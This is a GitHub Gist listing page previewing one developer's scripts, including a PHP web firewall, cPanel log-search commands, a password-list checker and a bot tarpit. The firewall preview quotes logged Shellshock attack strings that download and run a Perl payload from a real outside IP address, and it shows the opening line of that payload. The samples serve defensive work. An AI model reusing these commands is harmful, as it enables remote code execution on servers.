dhaupin
dhaupin
/ dev_script_simple_web_app_firewall.php
Last active
April 21, 2022 18:20
Function - WAF - Look for common injection, traversal, or escalation hits, then init an action
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // @@TODO@@ classify this as a pub pre-controller | |
| // @@TODO@@ semicolin var, might help edge \xYZ style hexors -- might affect speed though | |
| // @@TOTO@@ make vars to turn on blocking of common WP and enterprise requests | |
| // @@TODO@@ make modes to check in user agent, referrer, post, headers | |
| // @@TODO@@ mode for strict validation of IP in addr + forwarder style headers | |
| // @@TODO@@ testing mode (still allows traffic) | |
| // @@TODO@@ log wrapper and modes |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # http://31.220.3.180/mox | |
| #/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [16/Mar/2016:10:57:33 -0400] "GET /hello HTTP/1.0" 404 1987 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://31.220.3.180/g.pl;curl -O http://31.220.3.180/g.pl;wget http://31.220.3.180/g.pl;perl /tmp/g.pl*;perl g.pl;rm -rf /tmp/g.pl*\"" | |
| #/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [27/May/2016:08:09:12 -0400] "GET /bashh HTTP/1.0" 404 1984 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://31.220.3.180/mox;curl -O http://31.220.3.180/mox;wget http://31.220.3.180/mox;perl /tmp/mox*;perl mox;rm -rf /tmp/mox*\"" | |
| ############################################################################## | |
| #!/usr/bin/perl | |
| # ------------------------------------------------------------- # |
dhaupin
/ DUMP_shell_commands.txt
Last active
October 27, 2017 07:58
Rando Shell Commands for cPanel Servers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################## | |
| # Logs # | |
| ################## | |
| # Look through syslogs, ignore local, ignore SSL fails, ignore whitelist ip | |
| grep -Ev --color=always '(127.0.0.1|10.30.9.*|209.203.197.*|socket\ failed)' /var/log/messages /var/log/secure | less -R | |
| # Look through IP domlogs, ignore local, ignore whitelist ip, ignore bots, ignore controlscan | |
| grep -sh --color=always "Sep/2016" /usr/local/apache/domlogs/{50.28.34.226,206.196.110.58} | grep -Ev '(LiquidWeb|nagios|209.203.197.*|Google|bing|Baidu|Netcraft|majestic12|207.198.99*)' | less -R |
dhaupin
/ dev_script_ui_breakpoint_listener.css
Last active
December 2, 2019 03:16
Function - Listen for changes in CSS media breakpoints - append UI attribs to <html>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* UI Breakpoint Listener | |
| * Requires underscore/lodash for _debounce | |
| */ | |
| body:after { | |
| content: 'widescreen'; | |
| display: none; | |
| } | |
| @media screen and (max-width: 1024px){ | |
| body:after { |
dhaupin
/ dev_script_chk_common_passwords.php
Last active
March 11, 2016 01:10
Function - Parse list of 10,000 most used passwords and return JSON or Object match for use on account validation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // This is part of a form class, this function shalt also be available via route with optional ?search= param | |
| // password list: https://github.com/danielmiessler/SecLists/blob/master/Passwords/10_million_password_list_top_10000.txt | |
| // example: www.example.com/chkpw.php&search=dra would return "dragon" (always returns the first pass found) | |
| public function chkpass($password = false, $json = true) { | |
| $pool = $output = array(); | |
| $pool = file('https://src.creadev.org/apps/pwlist/pwlist.txt', FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES); |
dhaupin
/ dev_script_x_debugger_logger.php
Last active
April 28, 2017 17:09
Function - print_r() and trace using x_r() wrapper with optional JS console.dir() or clean exit(). Additional x_dump() simple file dump.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Exits with a print_r and call trace for debugging | |
| // $hidden inits array output into browser console | |
| // Backtrace: jurchiks101 at gmail dot com - http://php.net/manual/en/function.debug-backtrace.php#112238 | |
| if (!function_exists('x_r')) { | |
| function x_r($obj, $exit = true, $return = true, $hidden = false, $console_msg = '') { | |
| // include a debug call trace | |
| $e = new Exception(); |
dhaupin
/ dev_script_google_merch_taxonomy.php
Last active
September 12, 2021 09:26
Function - Parse Google merchant center shopping categories into Array or JSON - works with search url param or direct category_id argument
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // This is part of a product class, this function shalt also be available via route with optional ?search= param | |
| // $this->request->get is platform specific, change it to whatever your request wrapper uses | |
| public function googlecats($cat_ids = false) { | |
| // default format | |
| $json = true; |
dhaupin
/ dev_script_bot_tarpit.php
Last active
December 12, 2022 03:19
Function - Bot honeypot + timewaster tarpit + Fail2Ban
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Dribbler Tarbaby Community v.0.1.0 - Copyright 2013-2014 under GNU/GPL | |
| // Original script by Mike ([email protected]) | |
| // http://www.stopforumspam.com/forum/viewtopic.php?pid=41173 | |
| // | |
| // Contributors: | |
| // John Darkhorse | |
| // Derek Haupin ([email protected]) | |
| // | |
| // @@ WARNING @@ |
dhaupin
/ dev_script_asset_cachebuster.php
Last active
November 10, 2016 19:51
Function - Cachebuster - Add timestamp to assets in order to break out of browser caching
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (!function_exists('addTimestamp')) { | |
| function addTimestamp($src, $remote = false, $man_v = '') { | |
| if (empty($src)) { | |
| return; | |
| } elseif ($_SERVER['HTTP_HOST'] === $_SERVER['SERVER_NAME']) { | |
| $local_root = $_SERVER['DOCUMENT_ROOT'] . '/'; | |
| preg_match('/^([https]+:)?\/\//', $src, $src_proto); |